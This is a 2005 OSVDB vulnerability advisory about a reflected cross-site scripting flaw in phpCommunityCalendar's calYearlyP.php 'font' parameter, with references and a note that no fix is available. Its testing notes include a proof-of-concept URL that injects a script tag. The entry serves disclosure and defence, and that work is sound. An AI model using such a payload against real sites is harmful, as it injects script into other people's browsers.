phpCommunityCalendar calYearlyP.php font Variable XSS

2005-09-05T15:24:47
ID OSVDB:19367
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-09-05T15:24:47

Description

Vulnerability Description

phpCommunityCalendar contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'font' variable upon submission to the 'calYearlyP.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

phpCommunityCalendar contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'font' variable upon submission to the 'calYearlyP.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"

References:

Vendor URL: http://open.appideas.com/Calendar/ Secunia Advisory ID:16721 Related OSVDB ID: 19359 Related OSVDB ID: 19366 Related OSVDB ID: 19353 Related OSVDB ID: 19357 Related OSVDB ID: 19358 Related OSVDB ID: 19361 Related OSVDB ID: 19364 Related OSVDB ID: 19354 Related OSVDB ID: 19355 Related OSVDB ID: 19356 Related OSVDB ID: 19360 Related OSVDB ID: 19362 Other Advisory URL: http://www.rgod.altervista.org/phpccal.html Nessus Plugin ID:19595 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-09/0057.html ISS X-Force ID: 22176 CVE-2005-2882